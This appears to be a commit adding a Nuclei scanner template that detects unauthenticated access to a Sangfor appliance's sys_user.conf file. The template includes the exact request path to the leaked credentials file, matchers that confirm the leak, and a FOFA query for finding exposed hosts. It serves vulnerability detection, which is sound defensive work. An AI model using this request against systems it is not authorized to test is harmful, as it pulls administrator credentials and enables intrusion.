Merge pull request #7840 from projectdiscovery/sangfor-sysuser-conf

Create sangfor-sysuser-conf.yaml
patch-1
pussycat0x 2023-08-07 19:31:25 +05:30 committed by GitHub
commit e233b549bb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: sangfor-sysuser-conf
info:
name: Sangfor Application sys_user.conf Account Password Leakage
author: DhiyaneshDk
severity: high
description: |
Sangfor application delivery management system file sys_user.conf can be directly accessed without authorization, resulting in leakage of account and password
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20sys_user.conf%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
- https://github.com/achuna33/MYExploit/blob/master/src/main/java/com/achuna33/Controllers/SangForController.java
metadata:
max-request: 1
fofa-query: app="SANGFOR-应用交付管理系统"
tags: lfi,sangfor,exposure
http:
- method: GET
path:
- "{{BaseURL}}/tmp/updateme/sinfor/ad/sys/sys_user.conf"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "true"
- "admin"
- "密码"
condition: and
- type: status
status:
- 200